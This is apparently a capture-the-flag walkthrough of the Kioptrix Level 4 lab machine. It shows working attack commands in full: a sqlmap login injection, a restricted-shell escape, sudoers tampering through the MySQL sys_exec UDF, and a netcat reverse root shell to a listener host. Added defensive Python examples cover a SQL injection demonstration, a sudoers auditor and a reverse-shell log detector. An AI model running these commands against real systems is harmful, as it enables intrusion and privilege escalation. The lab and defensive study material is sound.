Kioptrix Level 4

Information Gathering

Nmap


root@kali:~# nmap -v -A -p1-65535 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 19:16 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating ARP Ping Scan at 19:16
Scanning 192.168.1.10 [1 port]
Completed ARP Ping Scan at 19:16, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:16
Completed Parallel DNS resolution of 1 host. at 19:16, 13.00s elapsed
Initiating SYN Stealth Scan at 19:16
Scanning 192.168.1.10 [65535 ports]
Discovered open port 22/tcp on 192.168.1.10
Discovered open port 139/tcp on 192.168.1.10
Discovered open port 80/tcp on 192.168.1.10
Discovered open port 445/tcp on 192.168.1.10
Completed SYN Stealth Scan at 19:16, 24.75s elapsed (65535 total ports)
Initiating Service scan at 19:16
Scanning 4 services on 192.168.1.10
Completed Service scan at 19:16, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.10
NSE: Script scanning 192.168.1.10.
Initiating NSE at 19:16
Completed NSE at 19:17, 30.09s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.02s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.01s elapsed
Nmap scan report for 192.168.1.10
Host is up (0.00030s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1D:08:07 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.101 days (since Sat Jul 28 17:51:25 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m04s, deviation: 3h32m08s, median: 3s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC:  (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: 
|   KIOPTRIX4<03>        Flags: 
|   KIOPTRIX4<20>        Flags: 
|   WORKGROUP<1e>        Flags: 
|_  WORKGROUP<00>        Flags: 
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-12-07T22:17:04-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.1.10

NSE: Script Post-scanning.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.19 seconds
           Raw packets sent: 91558 (4.029MB) | Rcvd: 39548 (1.583MB)
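The Nmap report above is long and the points that matter for the rest of the box (four open ports, an Apache 2.2 / PHP 5.2 stack, SMB with message signing disabled) are easy to miss. The following is an added example, not part of the original write-up: a small parser for Nmap's normal text output that pulls out the port table, the per-port and host script lines, and turns them into a short findings list. The sample text is a trimmed copy of the report above, and the "outdated" version thresholds (Apache below 2.4, PHP below 7.0) are thresholds chosen for this example, not anything Nmap itself reports.

```python
import re

# Constructed sample: a trimmed copy of the Nmap report shown above.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.10
Host is up (0.00030s latency).
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1D:08:07 (VMware)

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# Thresholds chosen for this example (assumption, not an Nmap value).
MIN_APACHE = (2, 4)
MIN_PHP = (7, 0)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(report):
    """Return {port: {proto, state, service, version, scripts}} from Nmap normal output."""
    ports, current = {}, None
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"proto": m.group(2), "state": m.group(3),
                              "service": m.group(4), "version": m.group(5).strip(),
                              "scripts": []}
        elif line.startswith("|"):
            # NSE script output is attached to the port line that precedes it
            if current is not None:
                ports[current]["scripts"].append(line.lstrip("|_ ").rstrip())
        else:
            current = None  # any other line ends the current port's script block
    return ports


def parse_host_scripts(report):
    """Return the stripped lines of the 'Host script results:' block."""
    lines, in_block = [], False
    for line in report.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
        elif in_block and line.startswith("|"):
            lines.append(line.lstrip("|_ ").rstrip())
        elif in_block and not line.strip():
            in_block = False
    return lines


def review(report):
    """Turn the parsed report into a list of findings a defender would act on."""
    findings = []
    for port, info in sorted(parse_ports(report).items()):
        if info["state"] != "open":
            continue
        m = re.search(r"Apache httpd (\d+)\.(\d+)", info["version"])
        if m and (int(m.group(1)), int(m.group(2))) < MIN_APACHE:
            findings.append(f"{port}/{info['proto']}: Apache {m.group(1)}.{m.group(2)} "
                            f"is older than {MIN_APACHE[0]}.{MIN_APACHE[1]}")
        m = re.search(r"PHP/(\d+)\.(\d+)", info["version"])
        if m and (int(m.group(1)), int(m.group(2))) < MIN_PHP:
            findings.append(f"{port}/{info['proto']}: PHP {m.group(1)}.{m.group(2)} "
                            f"is older than {MIN_PHP[0]}.{MIN_PHP[1]}")
    host_scripts = parse_host_scripts(report)
    if any(l.startswith("message_signing: disabled") for l in host_scripts):
        findings.append("445/tcp: SMB message signing disabled (host script smb-security-mode)")
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_NMAP):
        print(finding)
```

Feeding it a full `nmap -A` report works the same way, because lines that are neither a port row nor a `|` script line simply reset the parser; only the version thresholds and the SMB check would need extending for other services.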


Nikto


root@kali:~# nikto -h http://192.168.1.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.10
+ Target Hostname:    192.168.1.10
+ Target Port:        80
+ Start Time:         2019-12-07 19:18:29 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2019-12-07 19:19:13 (GMT-8) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Using sqlmap to inject


Target (the target line as recorded by sqlmap); when typed into a shell the --data value has to be quoted, otherwise the & characters split the command:

http://192.168.1.10/checklogin.php (POST)  # /usr/bin/sqlmap -u http://192.168.1.10/checklogin.php --data="myusername=234&mypassword=24&Submit=Login" --os-shell

John's SSH credentials came from the dumped members table:


Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
Database: Mysql
Table: user
[6 entries]
+-----------+------------------+-------------------------------------------+
| host      | user             | password                                  |
+-----------+------------------+-------------------------------------------+
| localhost | root             |                                           | 
| Kioptrix4 | root             |                                           | 
| 127.0.0.1 | root             |                                           | 
| localhost |                  |                                           | 
| Kioptrix4 |                  |                                           | 
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 | 
+-----------+------------------+-------------------------------------------+
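Two things make this step work: the login form builds its query from the submitted fields, and the members table holds the passwords in cleartext (john's stored value is exactly what logs in over SSH below). The following is an added example, not code from the box or from the Kioptrix author: a string-concatenated login check of the kind checklogin.php is assumed to use, next to a parameterised version, and then a version that stores salted PBKDF2 hashes instead of cleartext. The database is an in-memory SQLite stand-in constructed from the dump above; the injected username is the textbook `' OR '1'='1`, which is enough to show why the concatenated query accepts a login it should refuse.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for the dumped members table (cleartext passwords, as on the box).
MEMBERS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# Textbook injection input used only to demonstrate the difference between the variants.
BYPASS = "' OR '1'='1"


def make_db(rows=MEMBERS):
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)", rows)
    return db


def login_vulnerable(db, username, password):
    """Query built by concatenation: the pattern checklogin.php is assumed to use."""
    sql = ("SELECT username FROM members WHERE username='" + username +
           "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()  # user-supplied text has become part of the SQL
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Same query with bound parameters: the input can never change the SQL structure."""
    row = db.execute("SELECT username FROM members WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def hash_password(password, salt=None, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256, stored as algorithm$iterations$salt$digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(stored, password):
    _algo, iters, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate.hex(), digest_hex)  # constant-time compare


def make_hardened_db():
    """Same accounts, but only hashes are stored, so a dump no longer yields SSH passwords."""
    return make_db([(i, u, hash_password(p)) for i, u, p in MEMBERS])


def login_hardened(db, username, password):
    row = db.execute("SELECT username, password FROM members WHERE username=?",
                     (username,)).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]


if __name__ == "__main__":
    db, hdb = make_db(), make_hardened_db()
    print("vulnerable, injected   :", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterized, injected:", login_parameterized(db, BYPASS, BYPASS))
    print("hardened, real password:", login_hardened(hdb, "john", "MyNameIsJohn"))
    print("hardened, injected     :", login_hardened(hdb, BYPASS, BYPASS))
```

The parameterised query alone closes the injection; the hashed storage is what would have stopped the second half of this step, where a database dump turns directly into an SSH login.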

Getting a shell over SSH (escaping the restricted shell)


root@kali:~/.sqlmap/output# ssh john@192.168.1.10
john@192.168.1.10's password: 
Permission denied, please try again.
john@192.168.1.10's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ echo os.system("/bin/sh") 
$ whoami
john
$ 

Using the MySQL service (root account with an empty password, per the user table above) to change the ownership and permissions of /etc/sudoers via the sys_exec UDF

john@Kioptrix4:/$ mysql -u root -p
mysql> select sys_exec("chown -hR john:john /etc/sudoers");
mysql> select sys_exec("chmod +wrx /etc/sudoers");


john@Kioptrix4:/etc$ vim sudoers 

# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#

Defaults        env_reset

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL) ALL
john    ALL=(ALL) ALL
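Every part of this step leaves a trace a defender can check for: /etc/sudoers is no longer owned by root, its mode is no longer 0440, and a non-root user has been given `ALL=(ALL) ALL`. The following is an added example, not part of the original write-up: an audit routine that takes the file content and its stat values and reports each deviation. The sample sudoers text is the file as shown above; the uid/gid of 1000 and the 0777 mode used in the test are constructed values standing in for the post-tampering state (the page does not show the exact mode that `chmod +wrx` produced).

```python
import os
import stat

# Constructed sample: the /etc/sudoers content shown above, john line included.
SAMPLE_SUDOERS = """\
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#

Defaults        env_reset

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL) ALL
john    ALL=(ALL) ALL
"""

EXPECTED_MODE = 0o440  # sudoers as shipped on Debian/Ubuntu: root:root, r--r-----


def parse_spec(line):
    """Split 'user HOST=(runas) commands' into its parts, or None if not a user spec."""
    left, sep, right = line.partition("=")
    if not sep:
        return None
    parts = left.split()
    if len(parts) != 2:
        return None
    user, host = parts
    right = right.strip()
    runas = ""
    if right.startswith("("):
        runas, _, right = right[1:].partition(")")
    return user, host, runas.strip(), right.strip()


def audit_sudoers(text, uid, gid, mode, trusted_users=("root",)):
    """Return findings for a sudoers file given its content and stat values."""
    findings = []
    if uid != 0:
        findings.append(f"owner uid is {uid}, expected 0 (root)")
    if gid != 0:
        findings.append(f"group gid is {gid}, expected 0 (root)")
    perm = stat.S_IMODE(mode)
    if perm != EXPECTED_MODE:
        note = " (writable by group or others)" if perm & 0o022 else ""
        findings.append(f"mode is {perm:04o}, expected {EXPECTED_MODE:04o}{note}")
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        spec = parse_spec(line)
        if spec is None:
            continue
        user, host, runas, cmds = spec
        if user not in trusted_users and cmds.replace(" ", "").upper() in ("ALL", "NOPASSWD:ALL"):
            findings.append(f"line {lineno}: {user} may run ALL commands as ({runas}) on {host}")
    return findings


def audit_sudoers_file(path="/etc/sudoers"):
    """Convenience wrapper for a live system (needs root to read the file)."""
    st = os.stat(path)
    with open(path) as fh:
        text = fh.read()
    return audit_sudoers(text, st.st_uid, st.st_gid, st.st_mode)


if __name__ == "__main__":
    # Constructed stat values for the tampered file: owned by uid/gid 1000, mode 0777.
    for finding in audit_sudoers(SAMPLE_SUDOERS, 1000, 1000, 0o100777):
        print(finding)
```

On a clean Ubuntu host `audit_sudoers_file()` returns an empty list; the ownership and mode checks also catch the case where the grant was added and then removed again but the file was never restored to root:root 0440, which is what the chown and chmod above leave behind.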

Using netcat for a reverse root shell (sudo now permits it)


john@Kioptrix4:/$ whereis netcat
netcat: /bin/netcat /usr/share/man/man1/netcat.1.gz
john@Kioptrix4:/$ sudo netcat 192.168.1.7 999 -e /bin/bash


Got a root shell on the listener


root@kali:/usr/share/exploitdb/exploits/linux/remote# nc -nvlp 999
listening on [any] 999 ...
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.10] 46235
whoami
root
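Because the final step goes through sudo, it is logged: sudo writes one auth.log line per invocation with the invoking user, the target user and the full command. The following is an added example, not part of the original write-up: a detector that parses sudo's standard log format and raises an alert when a network tool (nc, netcat, ncat, socat) is run as root with an argument that executes a shell. The log lines are constructed to match what the session above would have produced; the timestamps and sshd line are made up for the sample.

```python
import os
import re

# Constructed auth.log lines in sudo's standard format; the second line corresponds
# to the command run on the box above, the others are benign filler.
SAMPLE_AUTH_LOG = """\
Dec  7 22:18:40 Kioptrix4 sshd[5012]: Accepted password for john from 192.168.1.7 port 50122 ssh2
Dec  7 22:21:03 Kioptrix4 sudo:     john : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/bin/netcat 192.168.1.7 999 -e /bin/bash
Dec  7 22:25:10 Kioptrix4 sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>[^;]+) ; PWD=(?P<pwd>[^;]+) ; USER=(?P<target>[^;]+) ; COMMAND=(?P<cmd>.*)$"
)

NETWORK_TOOLS = {"nc", "netcat", "ncat", "socat"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def parse_sudo(line):
    """Return the fields of a sudo log line as a dict, or None for any other line."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    return {k: v.strip() for k, v in m.groupdict().items()}


def is_reverse_shell(cmd):
    """True when a network tool is told to hand its connection to a shell."""
    argv = cmd.split()
    if not argv or os.path.basename(argv[0]) not in NETWORK_TOOLS:
        return False
    # nc/netcat/ncat: -e/-c/--exec/--sh-exec <program>
    for flag, value in zip(argv, argv[1:]):
        if flag in ("-e", "-c", "--exec", "--sh-exec") and os.path.basename(value) in SHELLS:
            return True
    # socat: EXEC:/bin/sh or SYSTEM:... address
    return any(arg.upper().startswith(("EXEC:", "SYSTEM:")) for arg in argv)


def detect(log_text):
    """Scan auth.log text and return an alert per root-level reverse shell via sudo."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_sudo(line)
        if ev and ev["target"] == "root" and is_reverse_shell(ev["cmd"]):
            alerts.append(f'{ev["ts"]} {ev["host"]}: {ev["user"]} ran "{ev["cmd"]}" as root via sudo')
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

The rule only fires on sudo-mediated invocations, which is the path this box takes; a reverse shell started without sudo would have to be caught elsewhere (process auditing or outbound connection monitoring), so the sudo log is one signal, not the only one.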
